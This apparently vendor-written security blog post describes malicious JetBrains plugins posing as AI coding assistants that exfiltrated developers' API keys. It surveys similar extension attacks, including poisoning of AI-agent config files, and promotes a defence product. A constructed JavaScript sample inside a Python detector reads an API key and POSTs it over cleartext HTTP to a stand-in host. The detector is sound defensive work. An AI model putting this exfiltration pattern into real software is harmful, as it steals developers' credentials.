15 malicious plugins on the official JetBrains Marketplace, posing as DeepSeek and CodeGPT AI coding assistants, quietly exfiltrated developers' AI provider API keys. Two of them — CodeGPT AI Assistant and DeepSeek AI Assist — passed 25,000 downloads each. The moment a developer pasted an OpenAI, DeepSeek, or SiliconFlow key into the plugin settings, it was shipped in plaintext HTTP to an attacker server. The keys were then resold — on the victims' bill.
What happened
The plugins were fully functional: chat, commit messages, code review, bug finding, unit tests. That's the point — they worked, so nobody looked twice. Underneath, a covert exfiltration path read the API-key field from the settings panel and POSTed it to a hardcoded endpoint over cleartext HTTP. No CVE, no software flaw — just trust abuse and supply chain.
In the same week, two "PromptSnatcher" Chrome ad-blocker extensions (100,000+ combined installs since 2022) were caught recording conversations from ChatGPT, Claude, Gemini, Copilot, Perplexity, and Grok — genuine ad-blocking as cover, conversation scraping underneath.
This is the exact threat class RuntimeAI Coding Agent Defense was built to detect, vet, and block — more on how below.
This isn't isolated — the AI coding surface is under sustained attack
The JetBrains campaign is the latest of many. The VS Code / Cursor / JetBrains extension ecosystem went from near-zero malicious activity to a steady stream of credential-stealing, source-exfiltrating, and self-propagating attacks in roughly 18 months:
- Nx Console (May 2026): attackers used a stolen contributor token to publish a malicious version of the popular Nx Console extension. The payload harvested cloud, CI/CD, and AI-coding-assistant credentials and exfiltrated ~3,800 internal GitHub repositories. (StepSecurity)
- 1.5M-install AI extensions (Jan 2026): two extensions marketed as AI coding assistants on the official VS Code Marketplace silently exfiltrated developer source code to remote servers — 1.5 million combined installs before exposure. (The Hacker News)
- GlassWorm (Oct 2025 → 2026, five waves): the first self-propagating VS Code extension worm — invisible-Unicode payloads that disappear from code review, Solana-based C2, harvesting NPM/GitHub/Git credentials and 49 crypto-wallet extensions. (Truesec)
- AI-agent config poisoning: .cursorrules poisoning, hidden instructions in CLAUDE.md, MCP-server injection, and AI-assistant SessionStart hooks have moved from theoretical to confirmed delivery mechanisms. (Phoenix Security)
- The trend: Microsoft removed 110 malicious extensions from the VS Code Marketplace in 2025, with detections roughly quadrupling year over year. (Visual Studio Magazine)
Different payloads, one pattern: the IDE extension is now a first-class supply-chain target — and the thing it reaches for is your developers' credentials, source, and AI-provider keys.
Why this surface is so exposed
AI coding assistants exploded across enterprises in the last 18 months; governance didn't follow. A plugin runs with the developer's full privileges and holds a long-lived key to your most expensive accounts. And most security teams have zero inventory of which AI plugins and extensions their developers installed — you can't govern what you can't see.
The root cause is not "a bad plugin." It's a long-lived, all-powerful secret pasted into an untrusted tool.
The honest part: what governance can't do
Let's be straight, because the easy marketing answer ("we'd have stopped it") isn't true for anyone. No platform stops a developer from installing a plugin from an official marketplace — that's endpoint and MDM territory. RuntimeAI is not an EDR or a marketplace gatekeeper.
But the breach didn't happen because of the install. It happened because of what the plugin could steal. Change that, and the attack collapses.
What changes the outcome: RuntimeAI Coding Agent Defense
RuntimeAI Coding Agent Defense is built for exactly this attack class — it takes AI Discovery from inventory-only ("we see the plugin") to detect-vet-and-block ("this plugin is malicious, here's why, and we stopped it"). Five layers:
Discover · Vet · Block · Contain · Prove
- Discover / See it. RuntimeAI Discovery surfaces every AI plugin, MCP connection, and coding assistant installed across your developers — the shadow AI you can't govern if you can't see. You learn from your own dashboard, not a vendor breach notice.
- Vet it. RuntimeAI Coding Agent Defense scans the plugin's code (VS Code/Cursor JS, JetBrains JVM, Python agents) for the exact pattern in this attack — a credential field read and sent over cleartext HTTP — plus hardcoded exfil endpoints, obfuscation, and IOC matches against STIX/TAXII feeds.
- Make the prize worthless. With the Secure LLM Router + QuantumVault / PQ TokenVault, developers and agents draw short-lived, scoped, identity-bound tokens from a vault — they never hold the raw provider key. A plugin that steals "the key" steals a revocable, low-blast-radius token, not a blank check on your OpenAI account.
- Block & contain. Enforced IDE egress blocks plaintext exfil to non-allowlisted endpoints (fail-closed). On a confirmed-malicious verdict, the agent identity is kill-switched, its vaulted tokens revoked, and the endpoint quarantined via your MDM/EDR.
- Prove it. Every verdict and action lands in a tamper-proof, post-quantum-signed Merkle audit trail — forensics in minutes, not months.
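As an added example (not RuntimeAI's code and not code from any real plugin), a small static triage check in Python for the pattern described in "What happened" and in the "Vet it" layer: a credential-named identifier handed to a network call whose hardcoded endpoint is cleartext http:// or not on an assumed provider allowlist. The two plugin snippets and the allowlist are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample in the shape of the attack described above: the settings
# handler reads the API-key field and POSTs it to a hardcoded http:// URL.
# Illustrative only; not code from any real plugin.
MALICIOUS_SAMPLE = """
class SettingsPanel {
  save() {
    const apiKey = this.form.getValue("openai.apiKey");
    fetch("http://telemetry.plugin-example.invalid/collect", {
      method: "POST", body: JSON.stringify({ k: apiKey }),
    });
  }
}
"""
# Constructed benign counterpart: the same key goes only to the provider, over TLS.
BENIGN_SAMPLE = """
async function complete(prompt) {
  const apiKey = settings.get("openai.apiKey");
  return fetch("https://api.openai.com/v1/chat/completions", {
    method: "POST", headers: { Authorization: `Bearer ${apiKey}` },
  });
}
"""

CRED_NAME = re.compile(r"\b\w*(?:api[_-]?key|secret|token)\w*\b", re.I)  # credential-looking identifiers
QUOTED_URL = re.compile(r"""["'](https?://[^"'\s]+)["']""")               # hardcoded endpoints
NETWORK_CALL = re.compile(r"\b(fetch|XMLHttpRequest|HttpURLConnection|OkHttpClient|requests\.post|axios)\b")
PROVIDER_ALLOWLIST = {"api.openai.com", "api.deepseek.com"}  # assumed: hosts a provider plugin may call

def scan_plugin_source(src, allowlist=PROVIDER_ALLOWLIST, window=5):
    """Flag each network call whose next `window` lines mention a credential
    identifier and target a cleartext, unknown, or non-allowlisted endpoint."""
    lines = src.splitlines()
    cred_names = {m.group(0) for m in CRED_NAME.finditer(src)}
    findings = []
    for i, line in enumerate(lines):
        if not NETWORK_CALL.search(line):
            continue
        chunk = "\n".join(lines[i:i + window])
        creds = sorted(n for n in cred_names if re.search(rf"\b{re.escape(n)}\b", chunk))
        for url in QUOTED_URL.findall(chunk) or [None]:  # None = dynamic destination, review it
            host = urlparse(url).hostname if url else None
            cleartext = bool(url) and url.startswith("http://")
            if creds and (cleartext or host not in allowlist):
                findings.append({"line": i + 1, "endpoint": url, "host": host,
                                 "cleartext": cleartext, "credentials": creds})
    return findings
```

The benign snippet produces no finding because the key only reaches an allowlisted host over TLS; the malicious one is flagged twice over, for cleartext transport and for an unknown destination.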
Where RuntimeAI Coding Agent Defense draws the line
We tell every customer exactly where the boundary is: RuntimeAI Coding Agent Defense doesn't block the OS-level install — we detect, vet, block the exfil, and push the verdict to your MDM/EDR (Intune, Jamf, CrowdStrike) to quarantine. We ingest standard threat-intel feeds; we don't run a threat-research shop. The truthful ceiling is "caught and neutralized before damage," not "the plugin can never land on the machine."
That's the bet behind RuntimeAI Coding Agent Defense: identity for every agent, zero-trust enforcement at the point of action, and defence-in-depth with post-quantum-safe data security underneath. We'll say it plainly: we built one of the best identity stacks out there — and we still tell every customer it's the front door, not the whole house. RuntimeAI Coding Agent Defense is what locks the rest of it.
See the malicious plugin before it sees your keys.
RuntimeAI Coding Agent Defense detects, vets, and blocks malicious AI coding plugins and browser extensions — across VS Code, Cursor, and JetBrains. Get the AI Security Weekly briefing for the threats that matter.